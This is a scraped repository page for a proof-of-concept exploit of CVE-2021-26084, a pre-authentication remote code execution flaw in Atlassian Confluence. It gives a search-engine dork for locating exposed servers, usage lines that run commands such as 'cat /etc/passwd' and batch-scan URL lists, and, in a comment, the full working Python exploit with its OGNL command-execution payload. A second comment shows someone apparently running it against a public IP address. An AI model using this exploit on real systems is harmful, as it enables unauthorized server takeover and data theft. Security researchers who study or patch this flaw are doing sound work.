CVE-2021-26084 Remote Code Execution on Confluence Servers

Overview

CVE-2021-26084

CVE-2021-26084 Remote Code Execution on Confluence Servers.

burp

Dork

Fofa:

app="ATLASSIAN-Confluence"

Usage

Show help information.

python PoC.py

help

Vulnerability verification for individual websites.

python PoC.py -u https://1.1.1.1

url

Command execution.

python PoC.py -u https://1.1.1.1 -e 'cat /etc/passwd'

rce

Batch testing.

python PoC.py -f urls.txt

file

Reference

You might also like...
Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

CVE-2021-22911 Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1 The getPasswordPolicy method is vulnerable to NoS

Strapi Framework Vulnerable to Remote Code Execution

CVE-2019-19609 Strapi Framework Vulnerable to Remote Code Execution well, I didnt found any exploit for CVE-2019-19609 so I wrote one. :/ Usage pytho

A Python replicated exploit for Webmin 1.580 /file/show.cgi Remote Code Execution

CVE-2012-2982 John Hammond | September 4th, 2021 Checking searchsploit for Webmin 1.580 I only saw a Metasploit module for the /file/show.cgi Remote C

Scan all java processes on your host to check weather it's affected by log4j2 remote code execution

Log4j2 Vulnerability Local Scanner (CVE-2021-45046) Log4j 漏洞本地检测脚本,扫描主机上所有java进程,检测是否引入了有漏洞的log4j-core jar包,是否可能遭到远程代码执行攻击(CVE-2021-45046)。上传扫描报告到指定的服

ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)
ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF-GetWebShell)

ProxyLogon For Python3 ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF-GetWebShell) usage: python ProxyLogon.py --host=exchang

Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.

PrintNightmare Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket. Installtion $ pip3 install impacket

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Known issues it will not work outside kali , i will update it

Exploiting CVE-2021-42278 and CVE-2021-42287

noPac Exploiting CVE-2021-42278 and CVE-2021-42287 原项目noPac在实现上可能有点问题,导致在本地没有打通,于是参考sam-the-admin项目进行修改。 使用 pip3 install -r requirements.txt # GetShel

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

About Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Changed from sam-the-admin. Usage SAM THE ADMIN CVE-202

Comments
  • 附上可用的code,解决标签定位的小问题,非常感谢作者提供的代码!

    附上可用的code,解决标签定位的小问题,非常感谢作者提供的代码!

    第56行修改method="POST" 为method="post"

    附上可用的code:

    #!/usr/bin/env python3
    # -*- encoding: utf-8 -*-
    """
    @File    :   PoC.py
    @Time    :   2021/09/01 14:16:26
    @Author  :   _0xf4n9x_
    @Version :   1.0
    @Contact :   [email protected]
    """
    
    
    import requests
    import sys
    import os
    import urllib3
    import argparse
    from bs4 import BeautifulSoup
    urllib3.disable_warnings()
    
    
    def usage():
        print("Eg: \n    python3 PoC.py -u http://127.0.0.1")
        print("    python3 PoC.py -u httts://127.0.0.1 -e 'cat /etc/passwd'")
        print("    python3 PoC.py -f urls.txt")
    
    
    def poc(host):
        url = host + "/pages/doenterpagevariables.action"
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
            "Content-Type": "application/x-www-form-urlencoded"}
        params = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022ifconfig\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
        try:
            res = requests.post(url, headers=headers, data=params,
                                timeout=10, verify=False)
            if 'netmask' and 'inet' and 'netmask' in res.text:
                print("[+] " + host + " is vulnerable!")
                return 1
            else:
                print("[-] " + host + " is not vulnerable!")
        except:
            pass
    
    
    def exp(host, command):
        url = host + "/pages/doenterpagevariables.action"
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
            "Content-Type": "application/x-www-form-urlencoded"}
        params = {
            "queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022" + command + "\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
    
        res = requests.post(url, headers=headers, data=params,
                            timeout=10, verify=False).text
        print(res)
        soup = BeautifulSoup(res, "html5lib")
        content = soup.find(method="post").find_all('input')[1]["value"]
    
        print(content.replace('aaaaaaaa[', '').replace('\n]', ''))
    
    
    if __name__ == '__main__':
        parser = argparse.ArgumentParser(
            description="CVE-2021-26084 Remote Code Execution on Confluence Servers")
        parser.add_argument('-u', '--url', type=str,
                            help="vulnerability verification for individual websites")
        parser.add_argument('-e', '--exec', type=str,
                            help="command execution")
        parser.add_argument('-f', '--file', type=str,
                            help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
        args = parser.parse_args()
        if len(sys.argv) == 3:
            if sys.argv[1] in ['-u', '--url']:
                poc(args.url)
            elif sys.argv[1] in ['-f', '--file']:
                if os.path.isfile(args.file) == True:
                    with open(args.file) as target:
                        hosts = []
                        hosts = target.read().splitlines()
                        for host in hosts:
                            if poc(host) == 1:
                                with open("success.txt", "a+") as f:
                                    f.write(host + "\n")
        elif len(sys.argv) == 5:
            if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-e', '--exec']):
                if poc(args.url) == 1:
                    exp(args.url, args.exec)
        else:
            parser.print_help()
            usage()
    
    
    opened by Kar1chan 2
  • raceback (most recent call last):

    raceback (most recent call last):

    root@ubuntu:~/CVE-2021-26084# python3 PoC.py -u http://51.75.89.1/ [+] http://51.75.89.114//pages/createpage-entervariables.action?SpaceKey=x is vulnerable! root@ubuntu:~/CVE-2021-26084# python3 PoC.py -u http://51.75.89.1/ -e whoami [+] http://51.75.89.114//pages/createpage-entervariables.action?SpaceKey=x is vulnerable! Traceback (most recent call last): File "PoC.py", line 100, in exp(args.url, args.exec, path) File "PoC.py", line 66, in exp soup = BeautifulSoup(res, "html5lib") File "/usr/local/lib/python3.6/dist-packages/bs4/init.py", line 251, in init % ",".join(features)) bs4.FeatureNotFound: Couldn't find a tree builder with the features you requested: html5lib. Do you need to install a parser library? root@ubuntu:~/CVE-2021-26084# python3 PoC.py -u http://51.75.89.1/ -e "whoami" [+] http://51.75.89.114//pages/createpage-entervariables.action?SpaceKey=x is vulnerable! Traceback (most recent call last): File "PoC.py", line 100, in exp(args.url, args.exec, path) File "PoC.py", line 66, in exp soup = BeautifulSoup(res, "html5lib") File "/usr/local/lib/python3.6/dist-packages/bs4/init.py", line 251, in init % ",".join(features)) bs4.FeatureNotFound: Couldn't find a tree builder with the features you requested: html5lib. Do you need to install a parser library? root@ubuntu:~/CVE-2021-26084#

    opened by websecer 0
Owner
FQ Hsu
FQ Hsu
POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL Pre-Auth RCE Injection Vulneralibity.

CVE-2021-26084 Description POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Pre-Auth RCE Injection V

antx 9 Aug 31, 2022
ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)

ExProlog ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065) Usage: exprolog.py [OPTIONS] ExProlog -

Herwono W. Wijaya 130 Dec 15, 2022
Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha

Hendrik Agung 2 Dec 30, 2021
Exploiting CVE-2021-44228 in vCenter for remote code execution and more

Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more. Blog post detailing exploitation linked below: COMING SOON Why? P

null 81 Dec 20, 2022
Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more

Log4jUnifi Exploiting CVE-2021-44228 in Unifi Network Application for remote cod

null 96 Jan 2, 2023
Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.

Log4jHorizon Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more. BLOG COMING SOON Code and README.md this time around are

null 96 Dec 14, 2022
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

null 3 Dec 4, 2022
HTTP Protocol Stack Remote Code Execution Vulnerability CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17. Detail HTTP

赛欧思网络安全研究实验室 365 Nov 30, 2022
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

dnspooq DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) For educational purposes only Requirements Docker compo

Teppei Fukuda 80 Nov 28, 2022
Gitlab RCE - Remote Code Execution

Gitlab RCE - Remote Code Execution RCE for old gitlab version <= 11.4.7 & 12.4.0-12.8.1 LFI for old gitlab versions 10.4 - 12.8.1 This is an exploit f

null 153 Nov 9, 2022